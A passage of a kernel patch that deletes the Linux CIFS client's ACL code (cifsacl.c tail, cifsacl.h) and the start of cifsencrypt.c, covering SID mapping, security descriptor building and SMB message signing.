+-				goto chown_chgrp_exit;
+-			}
+-			id = from_kuid(&init_user_ns, uid);
+-			if (id_from_sid) {
+-				struct owner_sid *osid = (struct owner_sid *)nowner_sid_ptr;
+-				/* Populate the user ownership fields S-1-5-88-1 */
+-				osid->Revision = 1;
+-				osid->NumAuth = 3;
+-				osid->Authority[5] = 5;
+-				osid->SubAuthorities[0] = cpu_to_le32(88);
+-				osid->SubAuthorities[1] = cpu_to_le32(1);
+-				osid->SubAuthorities[2] = cpu_to_le32(id);
+-
+-			} else { /* lookup sid with upcall */
+-				rc = id_to_sid(id, SIDOWNER, nowner_sid_ptr);
+-				if (rc) {
+-					cifs_dbg(FYI, "%s: Mapping error %d for owner id %d\n",
+-						 __func__, rc, id);
+-					goto chown_chgrp_exit;
+-				}
+-			}
+-			*aclflag |= CIFS_ACL_OWNER;
+-		}
+-		if (gid_valid(gid)) { /* chgrp */
+-			gid_t id;
+-			ngroup_sid_ptr = kzalloc(sizeof(struct cifs_sid),
+-								GFP_KERNEL);
+-			if (!ngroup_sid_ptr) {
+-				rc = -ENOMEM;
+-				goto chown_chgrp_exit;
+-			}
+-			id = from_kgid(&init_user_ns, gid);
+-			if (id_from_sid) {
+-				struct owner_sid *gsid = (struct owner_sid *)ngroup_sid_ptr;
+-				/* Populate the group ownership fields S-1-5-88-2 */
+-				gsid->Revision = 1;
+-				gsid->NumAuth = 3;
+-				gsid->Authority[5] = 5;
+-				gsid->SubAuthorities[0] = cpu_to_le32(88);
+-				gsid->SubAuthorities[1] = cpu_to_le32(2);
+-				gsid->SubAuthorities[2] = cpu_to_le32(id);
+-
+-			} else { /* lookup sid with upcall */
+-				rc = id_to_sid(id, SIDGROUP, ngroup_sid_ptr);
+-				if (rc) {
+-					cifs_dbg(FYI, "%s: Mapping error %d for group id %d\n",
+-						 __func__, rc, id);
+-					goto chown_chgrp_exit;
+-				}
+-			}
+-			*aclflag |= CIFS_ACL_GROUP;
+-		}
+-
+-		if (dacloffset) {
+-			/* Replace ACEs for old owner with new one */
+-			size = replace_sids_and_copy_aces(dacl_ptr, ndacl_ptr,
+-					owner_sid_ptr, group_sid_ptr,
+-					nowner_sid_ptr, ngroup_sid_ptr);
+-			ndacl_ptr->size = cpu_to_le16(size);
+-		}
+-
+-		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
+-		/* copy the non-dacl portion of secdesc */
+-		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
+-				nowner_sid_ptr, ngroup_sid_ptr);
+-
+-chown_chgrp_exit:
+-		/* errors could jump here. So make sure we return soon after this */
+-		kfree(nowner_sid_ptr);
+-		kfree(ngroup_sid_ptr);
+-	}
+-
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *cifs_sb,
+-				      const struct cifs_fid *cifsfid, u32 *pacllen,
+-				      u32 __maybe_unused unused)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	unsigned int xid;
+-	int rc;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	xid = get_xid();
+-	rc = CIFSSMBGetCIFSACL(xid, tlink_tcon(tlink), cifsfid->netfid, &pntsd,
+-				pacllen);
+-	free_xid(xid);
+-
+-	cifs_put_tlink(tlink);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+-		const char *path, u32 *pacllen)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	int oplock = 0;
+-	unsigned int xid;
+-	int rc;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = READ_CONTROL,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (!rc) {
+-		rc = CIFSSMBGetCIFSACL(xid, tcon, fid.netfid, &pntsd, pacllen);
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-/* Retrieve an ACL from the server */
+-struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *cifs_sb,
+-				      struct inode *inode, const char *path,
+-			       u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	struct cifsFileInfo *open_file = NULL;
+-
+-	if (inode)
+-		open_file = find_readable_file(CIFS_I(inode), true);
+-	if (!open_file)
+-		return get_cifs_acl_by_path(cifs_sb, path, pacllen);
+-
+-	pntsd = get_cifs_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
+-	cifsFileInfo_put(open_file);
+-	return pntsd;
+-}
+-
+- /* Set an ACL on the server */
+-int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+-			struct inode *inode, const char *path, int aclflag)
+-{
+-	int oplock = 0;
+-	unsigned int xid;
+-	int rc, access_flags;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	if (aclflag == CIFS_ACL_OWNER || aclflag == CIFS_ACL_GROUP)
+-		access_flags = WRITE_OWNER;
+-	else
+-		access_flags = WRITE_DAC;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = access_flags,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc) {
+-		cifs_dbg(VFS, "Unable to open file to set ACL\n");
+-		goto out;
+-	}
+-
+-	rc = CIFSSMBSetCIFSACL(xid, tcon, fid.netfid, pnntsd, acllen, aclflag);
+-	cifs_dbg(NOISY, "SetCIFSACL rc = %d\n", rc);
+-
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/* Translate the CIFS ACL (similar to NTFS ACL) for a file into mode bits */
+-int
+-cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
+-		  struct inode *inode, bool mode_from_special_sid,
+-		  const char *path, const struct cifs_fid *pfid)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	u32 acllen = 0;
+-	int rc = 0;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct smb_version_operations *ops;
+-	const u32 info = 0;
+-
+-	cifs_dbg(NOISY, "converting ACL to mode for %s\n", path);
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	ops = tlink_tcon(tlink)->ses->server->ops;
+-
+-	if (pfid && (ops->get_acl_by_fid))
+-		pntsd = ops->get_acl_by_fid(cifs_sb, pfid, &acllen, info);
+-	else if (ops->get_acl)
+-		pntsd = ops->get_acl(cifs_sb, inode, path, &acllen, info);
+-	else {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-	/* if we can retrieve the ACL, now parse Access Control Entries, ACEs */
+-	if (IS_ERR(pntsd)) {
+-		rc = PTR_ERR(pntsd);
+-		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
+-	} else if (mode_from_special_sid) {
+-		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, true);
+-		kfree(pntsd);
+-	} else {
+-		/* get approximated mode from ACL */
+-		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, false);
+-		kfree(pntsd);
+-		if (rc)
+-			cifs_dbg(VFS, "parse sec desc failed rc = %d\n", rc);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-
+-	return rc;
+-}
+-
+-/* Convert mode bits to an ACL so we can update the ACL on the server */
+-int
+-id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
+-			kuid_t uid, kgid_t gid)
+-{
+-	int rc = 0;
+-	int aclflag = CIFS_ACL_DACL; /* default flag to set */
+-	__u32 secdesclen = 0;
+-	__u32 nsecdesclen = 0;
+-	__u32 dacloffset = 0;
+-	struct cifs_acl *dacl_ptr = NULL;
+-	struct cifs_ntsd *pntsd = NULL; /* acl obtained from server */
+-	struct cifs_ntsd *pnntsd = NULL; /* modified acl to be sent to server */
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct smb_version_operations *ops;
+-	bool mode_from_sid, id_from_sid;
+-	const u32 info = 0;
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	ops = tlink_tcon(tlink)->ses->server->ops;
+-
+-	cifs_dbg(NOISY, "set ACL from mode for %s\n", path);
+-
+-	/* Get the security descriptor */
+-
+-	if (ops->get_acl == NULL) {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	pntsd = ops->get_acl(cifs_sb, inode, path, &secdesclen, info);
+-	if (IS_ERR(pntsd)) {
+-		rc = PTR_ERR(pntsd);
+-		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
+-		cifs_put_tlink(tlink);
+-		return rc;
+-	}
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
+-		mode_from_sid = true;
+-	else
+-		mode_from_sid = false;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-		id_from_sid = true;
+-	else
+-		id_from_sid = false;
+-
+-	/* Potentially, five new ACEs can be added to the ACL for U,G,O mapping */
+-	nsecdesclen = secdesclen;
+-	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
+-		if (mode_from_sid)
+-			nsecdesclen += 2 * sizeof(struct cifs_ace);
+-		else /* cifsacl */
+-			nsecdesclen += 5 * sizeof(struct cifs_ace);
+-	} else { /* chown */
+-		/* When ownership changes, changes new owner sid length could be different */
+-		nsecdesclen = sizeof(struct cifs_ntsd) + (sizeof(struct cifs_sid) * 2);
+-		dacloffset = le32_to_cpu(pntsd->dacloffset);
+-		if (dacloffset) {
+-			dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-			if (mode_from_sid)
+-				nsecdesclen +=
+-					le32_to_cpu(dacl_ptr->num_aces) * sizeof(struct cifs_ace);
+-			else /* cifsacl */
+-				nsecdesclen += le16_to_cpu(dacl_ptr->size);
+-		}
+-	}
+-
+-	/*
+-	 * Add three ACEs for owner, group, everyone getting rid of other ACEs
+-	 * as chmod disables ACEs and set the security descriptor. Allocate
+-	 * memory for the smb header, set security descriptor request security
+-	 * descriptor parameters, and security descriptor itself
+-	 */
+-	nsecdesclen = max_t(u32, nsecdesclen, DEFAULT_SEC_DESC_LEN);
+-	pnntsd = kmalloc(nsecdesclen, GFP_KERNEL);
+-	if (!pnntsd) {
+-		kfree(pntsd);
+-		cifs_put_tlink(tlink);
+-		return -ENOMEM;
+-	}
+-
+-	rc = build_sec_desc(pntsd, pnntsd, secdesclen, &nsecdesclen, pnmode, uid, gid,
+-			    mode_from_sid, id_from_sid, &aclflag);
+-
+-	cifs_dbg(NOISY, "build_sec_desc rc: %d\n", rc);
+-
+-	if (ops->set_acl == NULL)
+-		rc = -EOPNOTSUPP;
+-
+-	if (!rc) {
+-		/* Set the security descriptor */
+-		rc = ops->set_acl(pnntsd, nsecdesclen, inode, path, aclflag);
+-		cifs_dbg(NOISY, "set_cifs_acl rc: %d\n", rc);
+-	}
+-	cifs_put_tlink(tlink);
+-
+-	kfree(pnntsd);
+-	kfree(pntsd);
+-	return rc;
+-}
+diff --git a/fs/cifs/cifsacl.h b/fs/cifs/cifsacl.h
+deleted file mode 100644
+index ccbfc754bd3c7..0000000000000
+--- a/fs/cifs/cifsacl.h
++++ /dev/null
+@@ -1,199 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSACL_H
+-#define _CIFSACL_H
+-
+-#define NUM_AUTHS (6)	/* number of authority fields */
+-#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
+-
+-#define READ_BIT        0x4
+-#define WRITE_BIT       0x2
+-#define EXEC_BIT        0x1
+-
+-#define ACL_OWNER_MASK 0700
+-#define ACL_GROUP_MASK 0070
+-#define ACL_EVERYONE_MASK 0007
+-
+-#define UBITSHIFT	6
+-#define GBITSHIFT	3
+-
+-#define ACCESS_ALLOWED	0
+-#define ACCESS_DENIED	1
+-
+-#define SIDOWNER 1
+-#define SIDGROUP 2
+-
+-/*
+- * Security Descriptor length containing DACL with 3 ACEs (one each for
+- * owner, group and world).
+- */
+-#define DEFAULT_SEC_DESC_LEN (sizeof(struct cifs_ntsd) + \
+-			      sizeof(struct cifs_acl) + \
+-			      (sizeof(struct cifs_ace) * 4))
+-
+-/*
+- * Maximum size of a string representation of a SID:
+- *
+- * The fields are unsigned values in decimal. So:
+- *
+- * u8:  max 3 bytes in decimal
+- * u32: max 10 bytes in decimal
+- *
+- * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
+- *
+- * For authority field, max is when all 6 values are non-zero and it must be
+- * represented in hex. So "-0x" + 12 hex digits.
+- *
+- * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
+- */
+-#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
+-#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
+-
+-struct cifs_ntsd {
+-	__le16 revision; /* revision level */
+-	__le16 type;
+-	__le32 osidoffset;
+-	__le32 gsidoffset;
+-	__le32 sacloffset;
+-	__le32 dacloffset;
+-} __attribute__((packed));
+-
+-struct cifs_sid {
+-	__u8 revision; /* revision level */
+-	__u8 num_subauth;
+-	__u8 authority[NUM_AUTHS];
+-	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
+-} __attribute__((packed));
+-
+-/* size of a struct cifs_sid, sans sub_auth array */
+-#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
+-
+-struct cifs_acl {
+-	__le16 revision; /* revision level */
+-	__le16 size;
+-	__le32 num_aces;
+-} __attribute__((packed));
+-
+-/* ACE types - see MS-DTYP 2.4.4.1 */
+-#define ACCESS_ALLOWED_ACE_TYPE	0x00
+-#define ACCESS_DENIED_ACE_TYPE	0x01
+-#define SYSTEM_AUDIT_ACE_TYPE	0x02
+-#define SYSTEM_ALARM_ACE_TYPE	0x03
+-#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
+-#define ACCESS_ALLOWED_OBJECT_ACE_TYPE	0x05
+-#define ACCESS_DENIED_OBJECT_ACE_TYPE	0x06
+-#define SYSTEM_AUDIT_OBJECT_ACE_TYPE	0x07
+-#define SYSTEM_ALARM_OBJECT_ACE_TYPE	0x08
+-#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
+-#define ACCESS_DENIED_CALLBACK_ACE_TYPE	0x0A
+-#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
+-#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
+-#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE	0x0D
+-#define SYSTEM_ALARM_CALLBACK_ACE_TYPE	0x0E /* Reserved */
+-#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
+-#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
+-#define SYSTEM_MANDATORY_LABEL_ACE_TYPE	0x11
+-#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
+-#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
+-
+-/* ACE flags */
+-#define OBJECT_INHERIT_ACE	0x01
+-#define CONTAINER_INHERIT_ACE	0x02
+-#define NO_PROPAGATE_INHERIT_ACE 0x04
+-#define INHERIT_ONLY_ACE	0x08
+-#define INHERITED_ACE		0x10
+-#define SUCCESSFUL_ACCESS_ACE_FLAG 0x40
+-#define FAILED_ACCESS_ACE_FLAG	0x80
+-
+-struct cifs_ace {
+-	__u8 type; /* see above and MS-DTYP 2.4.4.1 */
+-	__u8 flags;
+-	__le16 size;
+-	__le32 access_req;
+-	struct cifs_sid sid; /* ie UUID of user or group who gets these perms */
+-} __attribute__((packed));
+-
+-/*
+- * The current SMB3 form of security descriptor is similar to what was used for
+- * cifs (see above) but some fields are split, and fields in the struct below
+- * matches names of fields to the spec, MS-DTYP (see sections 2.4.5 and
+- * 2.4.6). Note that "CamelCase" fields are used in this struct in order to
+- * match the MS-DTYP and MS-SMB2 specs which define the wire format.
+- */
+-struct smb3_sd {
+-	__u8 Revision; /* revision level, MUST be one */
+-	__u8 Sbz1; /* only meaningful if 'RM' flag set below */
+-	__le16 Control;
+-	__le32 OffsetOwner;
+-	__le32 OffsetGroup;
+-	__le32 OffsetSacl;
+-	__le32 OffsetDacl;
+-} __packed;
+-
+-/* Meaning of 'Control' field flags */
+-#define ACL_CONTROL_SR	0x8000	/* Self relative */
+-#define ACL_CONTROL_RM	0x4000	/* Resource manager control bits */
+-#define ACL_CONTROL_PS	0x2000	/* SACL protected from inherits */
+-#define ACL_CONTROL_PD	0x1000	/* DACL protected from inherits */
+-#define ACL_CONTROL_SI	0x0800	/* SACL Auto-Inherited */
+-#define ACL_CONTROL_DI	0x0400	/* DACL Auto-Inherited */
+-#define ACL_CONTROL_SC	0x0200	/* SACL computed through inheritance */
+-#define ACL_CONTROL_DC	0x0100	/* DACL computed through inheritence */
+-#define ACL_CONTROL_SS	0x0080	/* Create server ACL */
+-#define ACL_CONTROL_DT	0x0040	/* DACL provided by trusted source */
+-#define ACL_CONTROL_SD	0x0020	/* SACL defaulted */
+-#define ACL_CONTROL_SP	0x0010	/* SACL is present on object */
+-#define ACL_CONTROL_DD	0x0008	/* DACL defaulted */
+-#define ACL_CONTROL_DP	0x0004	/* DACL is present on object */
+-#define ACL_CONTROL_GD	0x0002	/* Group was defaulted */
+-#define ACL_CONTROL_OD	0x0001	/* User was defaulted */
+-
+-/* Meaning of AclRevision flags */
+-#define ACL_REVISION	0x02 /* See section 2.4.4.1 of MS-DTYP */
+-#define ACL_REVISION_DS	0x04 /* Additional AceTypes allowed */
+-
+-struct smb3_acl {
+-	u8 AclRevision; /* revision level */
+-	u8 Sbz1; /* MBZ */
+-	__le16 AclSize;
+-	__le16 AceCount;
+-	__le16 Sbz2; /* MBZ */
+-} __packed;
+-
+-/*
+- * Used to store the special 'NFS SIDs' used to persist the POSIX uid and gid
+- * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-struct owner_sid {
+-	u8 Revision;
+-	u8 NumAuth;
+-	u8 Authority[6];
+-	__le32 SubAuthorities[3];
+-} __packed;
+-
+-struct owner_group_sids {
+-	struct owner_sid owner;
+-	struct owner_sid group;
+-} __packed;
+-
+-/*
+- * Minimum security identifier can be one for system defined Users
+- * and Groups such as NULL SID and World or Built-in accounts such
+- * as Administrator and Guest and consists of
+- * Revision + Num (Sub)Auths + Authority + Domain (one Subauthority)
+- */
+-#define MIN_SID_LEN  (1 + 1 + 6 + 4) /* in bytes */
+-
+-/*
+- * Minimum security descriptor can be one without any SACL and DACL and can
+- * consist of revision, type, and two sids of minimum size for owner and group
+- */
+-#define MIN_SEC_DESC_LEN  (sizeof(struct cifs_ntsd) + (2 * MIN_SID_LEN))
+-
+-#endif /* _CIFSACL_H */
+diff --git a/fs/cifs/cifsencrypt.c b/fs/cifs/cifsencrypt.c
+deleted file mode 100644
+index cbc18b4a9cb20..0000000000000
+--- a/fs/cifs/cifsencrypt.c
++++ /dev/null
+@@ -1,733 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Encryption and hashing operations relating to NTLM, NTLMv2.  See MS-NLMP
+- *   for more detailed information
+- *
+- *   Copyright (C) International Business Machines  Corp., 2005,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "cifsproto.h"
+-#include "ntlmssp.h"
+-#include <linux/ctype.h>
+-#include <linux/random.h>
+-#include <linux/highmem.h>
+-#include <linux/fips.h>
+-#include "../smbfs_common/arc4.h"
+-#include <crypto/aead.h>
+-
+-int __cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature,
+-			struct shash_desc *shash)
+-{
+-	int i;
+-	int rc;
+-	struct kvec *iov = rqst->rq_iov;
+-	int n_vec = rqst->rq_nvec;
+-
+-	/* iov[0] is actual data and not the rfc1002 length for SMB2+ */
+-	if (!is_smb1(server)) {
+-		if (iov[0].iov_len <= 4)
+-			return -EIO;
+-		i = 0;
+-	} else {
+-		if (n_vec < 2 || iov[0].iov_len != 4)
+-			return -EIO;
+-		i = 1; /* skip rfc1002 length */
+-	}
+-
+-	for (; i < n_vec; i++) {
+-		if (iov[i].iov_len == 0)
+-			continue;
+-		if (iov[i].iov_base == NULL) {
+-			cifs_dbg(VFS, "null iovec entry\n");
+-			return -EIO;
+-		}
+-
+-		rc = crypto_shash_update(shash,
+-					 iov[i].iov_base, iov[i].iov_len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	/* now hash over the rq_pages array */
+-	for (i = 0; i < rqst->rq_npages; i++) {
+-		void *kaddr;
+-		unsigned int len, offset;
+-
+-		rqst_page_get_length(rqst, i, &len, &offset);
+-
+-		kaddr = (char *) kmap(rqst->rq_pages[i]) + offset;
+-
+-		rc = crypto_shash_update(shash, kaddr, len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			kunmap(rqst->rq_pages[i]);
+-			return rc;
+-		}
+-
+-		kunmap(rqst->rq_pages[i]);
+-	}
+-
+-	rc = crypto_shash_final(shash, signature);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-/*
+- * Calculate and return the CIFS signature based on the mac key and SMB PDU.
+- * The 16 byte signature must be allocated by the caller. Note we only use the
+- * 1st eight bytes and that the smb header signature field on input contains
+- * the sequence number before this function is called. Also, this function
+- * should be called with the server->srv_mutex held.
+- */
+-static int cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature)
+-{
+-	int rc;
+-
+-	if (!rqst->rq_iov || !signature || !server)
+-		return -EINVAL;
+-
+-	rc = cifs_alloc_hash("md5", &server->secmech.md5);
+-	if (rc)
+-		return -1;
+-
+-	rc = crypto_shash_init(server->secmech.md5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init md5\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.md5,
+-		server->session_key.response, server->session_key.len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		return rc;
+-	}
+-
+-	return __cifs_calc_signature(rqst, server, signature, server->secmech.md5);
+-}
+-
+-/* must be called with server->srv_mutex held */
+-int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence_number)
+-{
+-	int rc = 0;
+-	char smb_signature[20];
+-	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return -EIO;
+-
+-	if ((cifs_pdu == NULL) || (server == NULL))
+-		return -EINVAL;
+-
+-	spin_lock(&server->srv_lock);
+-	if (!(cifs_pdu->Flags2 & SMBFLG2_SECURITY_SIGNATURE) ||
+-	    server->tcpStatus == CifsNeedNegotiate) {
+-		spin_unlock(&server->srv_lock);
+-		return rc;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	if (!server->session_estab) {
+-		memcpy(cifs_pdu->Signature.SecuritySignature, "BSRSPYL", 8);
+-		return rc;
+-	}
+-
+-	cifs_pdu->Signature.Sequence.SequenceNumber =
+-				cpu_to_le32(server->sequence_number);
+-	cifs_pdu->Signature.Sequence.Reserved = 0;
+-
+-	*pexpected_response_sequence_number = ++server->sequence_number;
+-	++server->sequence_number;
+-
+-	rc = cifs_calc_signature(rqst, server, smb_signature);
+-	if (rc)
+-		memset(cifs_pdu->Signature.SecuritySignature, 0, 8);
+-	else
+-		memcpy(cifs_pdu->Signature.SecuritySignature, smb_signature, 8);
+-
+-	return rc;
+-}
+-
+-int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence)
+-{
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = n_vec };
+-
+-	return cifs_sign_rqst(&rqst, server, pexpected_response_sequence);
+-}
+-
+-/* must be called with server->srv_mutex held */
+-int cifs_sign_smb(struct smb_hdr *cifs_pdu, struct TCP_Server_Info *server,
+-		  __u32 *pexpected_response_sequence_number)
+-{
+-	struct kvec iov[2];
+-
+-	iov[0].iov_base = cifs_pdu;
+-	iov[0].iov_len = 4;
+-	iov[1].iov_base = (char *)cifs_pdu + 4;
+-	iov[1].iov_len = be32_to_cpu(cifs_pdu->smb_buf_length);
+-
+-	return cifs_sign_smbv(iov, 2, server,
+-			      pexpected_response_sequence_number);
+-}
+-
+-int cifs_verify_signature(struct smb_rqst *rqst,
+-			  struct TCP_Server_Info *server,
+-			  __u32 expected_sequence_number)
+-{
+-	unsigned int rc;
+-	char server_response_sig[8];
+-	char what_we_think_sig_should_be[20];
+-	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return -EIO;
+-
+-	if (cifs_pdu == NULL || server == NULL)
+-		return -EINVAL;
+-
+-	if (!server->session_estab)
+-		return 0;
+-
+-	if (cifs_pdu->Command == SMB_COM_LOCKING_ANDX) {
+-		struct smb_com_lock_req *pSMB =
+-			(struct smb_com_lock_req *)cifs_pdu;
+-		if (pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE)
+-			return 0;
+-	}
+-
+-	/* BB what if signatures are supposed to be on for session but
+-	   server does not send one? BB */
+-
+-	/* Do not need to verify session setups with signature "BSRSPYL "  */
+-	if (memcmp(cifs_pdu->Signature.SecuritySignature, "BSRSPYL ", 8) == 0)
+-		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
+-			 cifs_pdu->Command);
+-
+-	/* save off the origiginal signature so we can modify the smb and check
+-		its signature against what the server sent */
+-	memcpy(server_response_sig, cifs_pdu->Signature.SecuritySignature, 8);
+-
+-	cifs_pdu->Signature.Sequence.SequenceNumber =
+-					cpu_to_le32(expected_sequence_number);
+-	cifs_pdu->Signature.Sequence.Reserved = 0;
+-
+-	cifs_server_lock(server);
+-	rc = cifs_calc_signature(rqst, server, what_we_think_sig_should_be);
+-	cifs_server_unlock(server);
+-
+-	if (rc)
+-		return rc;
+-
+-/*	cifs_dump_mem("what we think it should be: ",
+-		      what_we_think_sig_should_be, 16); */
+-
+-	if (memcmp(server_response_sig, what_we_think_sig_should_be, 8))
+-		return -EACCES;
+-	else
+-		return 0;
+-
+-}
+-
+-/* Build a proper attribute value/target info pairs blob.
+- * Fill in netbios and dns domain name and workstation name
+- * and client time (total five av pairs and + one end of fields indicator.
+- * Allocate domain name which gets freed when session struct is deallocated.
+- */
+-static int
+-build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	unsigned int dlen;
+-	unsigned int size = 2 * sizeof(struct ntlmssp2_name);
+-	char *defdmname = "WORKGROUP";
+-	unsigned char *blobptr;
+-	struct ntlmssp2_name *attrptr;
+-
+-	if (!ses->domainName) {
+-		ses->domainName = kstrdup(defdmname, GFP_KERNEL);
+-		if (!ses->domainName)
+-			return -ENOMEM;
+-	}
+-
+-	dlen = strlen(ses->domainName);
+-
+-	/*
+-	 * The length of this blob is two times the size of a
